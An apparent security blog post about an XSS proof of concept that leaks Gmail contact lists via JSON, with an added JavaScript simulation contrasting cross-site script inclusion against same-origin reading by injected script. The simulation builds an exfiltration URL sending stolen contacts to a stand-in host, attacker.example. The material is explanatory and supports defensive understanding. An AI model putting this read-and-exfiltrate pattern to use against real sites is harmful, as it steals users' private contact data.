beNi and I have been talking a lot about some issues within Gmail where too much information is disclosed by AJAX and JSON. Alas, it has finally been proven to allow for information disclosure. The example he built is based on a tiny XSS hole (one that requires user interaction), but any XSS hole will do; this is only a proof of concept. Click here to see his post on the topic.
This is the second time Google has had this issue (the first was found by Jeremiah Grossman over a year ago). It's not a good idea to have sensitive information exposed like this, but really, once you find XSS on a system it's almost irrelevant how the data is served. From this point forward your contact list will be vulnerable every time an XSS exploit is found (of which there are probably hundreds on the site at the moment). Not to mention the other terrible things you can do to Google consumers once you have XSS on Google. Nice find, beNi!
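To make the point concrete, here is an added example (my own illustration, not code from beNi's post, from Google, or from Gmail) that simulates a JSON contact-list endpoint and contrasts the two ways of reading it: a cross-site `<script src>` include, which is the older JSON-hijacking route, and a same-origin read issued by script already running in the origin, which is what an XSS gives you. The endpoint path, the session-cookie check, the attacker host and the contact data are all constructed for this illustration; the `)]}'` prefix is a common anti-XSSI convention used here only to show that such server-side hardening stops the first route and does nothing against the second.

```javascript
// Added example, not code from the original post or from Gmail.
// Simulates a JSON contact-list endpoint and two readers of it.
// Endpoint behaviour, cookie value, contact data and the attacker
// host are all constructed assumptions for this illustration.

const CONTACTS = [ // constructed sample data
  { name: "Alice Example", email: "alice@example.com" },
  { name: "Bob Example",   email: "bob@example.com" },
];

// Anti-XSSI prefix: evaluating it as JavaScript is a SyntaxError, so a
// cross-site <script src="/contacts"> include never reaches the array.
const XSSI_PREFIX = ")]}'\n";

// The server side (hypothetical): answer only when the browser sent the
// victim's session cookie, and prepend the prefix to the JSON body.
function contactsEndpoint(request) {
  if (request.cookie !== "SID=valid-session") {
    return { status: 403, body: "" };
  }
  return { status: 200, body: XSSI_PREFIX + JSON.stringify(CONTACTS) };
}

// Route 1: an attacker-controlled page includes the endpoint with
// <script src=...>. The browser attaches the victim's cookie, so the
// server answers, but the body is evaluated as script and the prefix
// throws before any data is exposed. Function() mirrors that evaluation.
function crossSiteScriptInclude() {
  const resp = contactsEndpoint({ cookie: "SID=valid-session" });
  try {
    new Function(resp.body)();
    return { leaked: true, data: null };
  } catch (e) {
    return { leaked: false, error: e.name };
  }
}

// Route 2: script injected via XSS runs inside the mail origin. It makes
// an ordinary same-origin request (cookie attached), reads the body as
// text, strips the prefix and parses the JSON. The prefix is no obstacle.
function readViaInjectedScript() {
  const resp = contactsEndpoint({ cookie: "SID=valid-session" });
  const body = resp.body.startsWith(XSSI_PREFIX)
    ? resp.body.slice(XSSI_PREFIX.length)
    : resp.body;
  return JSON.parse(body);
}

// What the injected script would do next: ship the parsed list off-origin,
// e.g. by setting an image source. Only the URL is built here; nothing is sent.
function buildExfilUrl(contacts, attackerHost = "attacker.example") {
  const payload = encodeURIComponent(JSON.stringify(contacts));
  return "https://" + attackerHost + "/collect?c=" + payload;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("cross-site include:", crossSiteScriptInclude());
  const stolen = readViaInjectedScript();
  console.log("via XSS:", stolen);
  console.log("exfil URL:", buildExfilUrl(stolen));
}
```

The asymmetry is the whole story: the prefix and the cookie check defend against a page on another origin, because that page can only include the response as script and can never read it as text. Script that already executes in the mail origin is, to the browser, indistinguishable from the site's own code, so the only fix that matters at that point is closing the XSS.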